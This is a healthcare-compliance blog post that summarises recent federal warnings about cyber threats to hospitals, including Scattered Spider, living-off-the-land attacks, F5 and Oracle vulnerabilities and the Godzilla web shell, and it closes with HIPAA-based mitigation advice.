Cyber threats against healthcare

Serious new cyberthreats to the healthcare sector are looming. Over the past six weeks, federal cybersecurity experts have published detailed warnings about each threat and offered advice on mitigation to defend against them.

The threats include:

Each threat is different and presents unique challenges and responses.

Scattered Spider

Scattered Spider is a financially motivated cybercriminal group that engages in data extortion and other criminal activities. It has been active since at least 2022 and is a native English-speaking group. Experts believe its members are based in the United States and the United Kingdom and are primarily between the ages of 19 and 22 as of September 2023. The group is also known as Octo Tempest, Roasted 0ktapus, Storm-0875, Starfraud, UNC3944, Scatter Swine, and Muddled Libra.

The group is considered an expert in social engineering. Its attacks typically begin with SMS phishing, phone calls to victim help desks, and SIM swapping. After compromising credentials via social engineering, the group impersonates employees in calls to the target organizations’ service desks to secure multifactor authentication (MFA) codes or password resets. By bypassing these security measures, the group has gained access deep inside networks, where it has successfully exfiltrated valuable data and launched ransomware.

Last April, we reported that hackers were using social engineering methods with spearfishing voice intrusions via hospital IT help desks. Although those attacks were not linked to a particular group, the tactics overlap with the Scattered Spider methods and may be related. For more information, see Social Engineering Attacks Targeting IT Help Desks in the Health Sector.

Read the Scattered Spider Analyst Note for more details, including mitigation steps.

Living Off the Land Attacks

These attacks are much harder to detect because they use legitimate software and functions available in the system they are attacking to perform malicious actions on it. Experts warn these are becoming more common.

Attackers can bypass traditional security measures and disguise their actions as legitimate system processes using trusted tools. They are particularly dangerous for healthcare systems that rely on a wide range of trusted tools and technologies.

Because these attacks are much more difficult to detect with legacy security tools, they give the attacker more time to escalate privileges, steal data, and set backdoors for future access. Moreover, this type of attack uses scripting languages to execute malicious code directly in memory, bypassing traditional antivirus software that primarily scans files on disk. Thus, it is extremely challenging for security teams to detect and mitigate these attacks.

Healthcare’s Unique Challenges

  • Healthcare organizations often operate in complex, decentralized environments with numerous interconnected systems, making maintaining consistent security measures across the entire network challenging.
  • Due to limited resources and budget constraints, many healthcare organizations rely on outdated software. Outdated software and unpatched vulnerabilities make healthcare entities easy targets for cybercriminals.
  • Increasing digitization and interconnectivity of medical devices bring new avenues for attack, further increasing the risk to healthcare systems. While this connectivity brings numerous benefits, it also introduces potential vulnerabilities that attackers can exploit to gain control over these life-sustaining devices.

Read the LOTL Alert for more details, including mitigation steps.

F5 Misconfigurations

F5, Inc. is an American technology company that provides large organizations worldwide with hardware and software services, including BIG-IP*, and software services, such as cloud computing and application delivery networking (ADN). Some of its customers include Bank of America, Microsoft, Oracle, Alaska Airlines, Tesla, and Meta. According to Wikipedia, 48 of the Fortune 50 companies are F5 customers.

Large enterprises and governments that rely on F5’s ability to handle high-bandwidth interactions are key targets of both nation-state and cybercrime groups. Consequently, any F5 vulnerability poses a significant security risk for its BIG-IP users and third parties whose personal and financial information may be stored on or processed by a vulnerable device.

*from DevCentral, an online F5 community, BIG-IP is “a collection of hardware platforms and software solutions providing services focused on security, reliability, and performance.”

Read the F5 Analyst Note for more information, including mitigation steps.

Miracle Exploit Vulnerabilities

The “Miracle Exploit” refers to critical vulnerabilities in Oracle products, primarily affecting Oracle Fusion Middleware and its ADF Faces framework, which is used to build web interfaces for Java EE applications.

The vulnerabilities were named the “Miracle Exploit” due to their severity and widespread impact.

The exploit allows attackers to execute remote code without authentication, compromising the system completely, exposing sensitive data, and enabling lateral movement within a network.

Organizations using affected Oracle products were advised to apply patches urgently to avoid exploitation. Cybercriminals could use the exploit as a part of larger attack chains, including deploying ransomware after initial system compromise.

Read the Miracle Exploit Alert for more details, including mitigation steps.

Godzilla Web Shell

The Godzilla “web shell” is a weapon cyber threat actors use to execute commands, manipulate files, and engage in other harmful and malicious activity on victim systems as part of a more extensive cyberattack.

According to the Gigamon blog, “A web shell is an internet-accessible malicious file implanted in a victim web server’s file system that enables an attacker to execute commands by visiting a web page. Once placed on a compromised web server, it allows an attacker to perform remote command execution to the operating system running on the host machine. The web shell provides the attacker with a form of persistence in the compromised system and the potential to further pivot through the network to compromise hosts and data that may not otherwise be externally accessible.”

The Godzilla version has been attributed to Chinese state threat actors and has been used to target various industries, including the health sector. It is publicly available and, therefore, accessible to any number of bad actors, and it should be treated as a serious threat.

Read the Godzilla Analyst Note for more details, including mitigation steps.

Follow the HIPAA Security Rule to Fight Cyber Crime

If you follow the HIPAA Security Rule, you already employ most mitigation steps and recommendations to fight against these newer threats. The HIPAA Security Rule is a blueprint to prevent cybercrime.

Some of the key steps include:

  • Install patches and update software immediately after receiving them
  • Monitor IT networks for unusual and suspicious activity
  • Limit access to authorized staff by function
  • Review and upgrade user authentication procedures
  • Enhance password protection
  • Limit the use of Remote Desktop Protocol (RDP) and other remote desktop services
  • Workforce cybersecurity awareness training, especially around phishing

If you need to jumpstart your risk analysis, need help with a security risk assessment, or have any other questions about preventing cybercrime intrusions, let us know.

Free HIPAA Checklist
What best describes you?